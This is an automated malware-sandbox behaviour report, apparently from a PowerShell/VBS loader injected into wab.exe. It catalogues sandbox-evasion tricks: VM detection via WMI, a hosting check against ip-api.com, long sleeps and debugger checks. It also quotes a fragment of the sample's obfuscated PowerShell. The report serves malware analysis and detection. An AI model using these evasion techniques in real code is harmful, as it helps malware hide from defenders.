Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: A70000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 25390000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 252D0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599401 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599281 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599169 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599058 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598937 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598827 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598073 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597953 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597844 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597733 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597513 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597296 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597187 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597076 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596968 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596746 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596406 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596297 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596187 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596078 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595968 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595733 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595402 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595294 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595179 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595060 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594733 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594400 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594281 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5169 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4710 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8484 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1249 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5130 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4649 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 4788 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2700 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5372 Thread sleep count: 8484 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320 Thread sleep count: 1249 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -35971150943733603s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1860 Thread sleep count: 5130 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1860 Thread sleep count: 4649 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -599401s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -599281s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -599169s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -599058s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -598937s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -598827s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -598719s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -598594s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -598484s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -598375s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -99859s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -598073s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -597953s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -597844s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -597733s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -597625s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -597513s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -597406s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -597296s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -597187s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -597076s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -596968s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -596859s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -596746s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -596625s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -596515s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -596406s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -596297s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -596187s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -596078s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -595968s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -595859s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -595733s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -595625s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -595515s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -595402s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -595294s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -595179s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -595060s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -594953s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -594844s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -594733s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -594625s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -594515s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -594400s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1708 Thread sleep time: -594281s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599401 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599281 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599169 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599058 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598937 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598827 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99859 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598073 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597953 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597844 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597733 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597513 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597296 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597187 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597076 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596968 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596746 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596406 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596297 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596187 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596078 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595968 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595859 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595733 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595402 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595294 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595179 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595060 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594844 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594733 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594400 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594281 Jump to behavior
Source: wscript.exe, 00000000.00000003.2110367714.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2111079924.000001D994259000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2109551833.000001D9941CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`^/
Source: wscript.exe, 00000000.00000003.2109738674.000001D99626D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2109838034.000001D996245000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000002.2111762406.000001D996237000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000002.2112275510.000001D9962F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.2965162151.0000026D5F2C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW L%SystemRoot%\system32\mswsock.dlleanliness;$Advertisement=$Aandelydens[0];sabotage (Shockhead 'ba ka$KonsogMallol,eeamoLng rbSt.dfa Extrl Oper:Mou tS Enc,tUninwoDyskimLbrikaNoveltS ppeoBemedlVejfoaDyrknlSikkeiAnv,la Cami=C arm( st pTValu.eLdst.sMandot re,l-Al
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
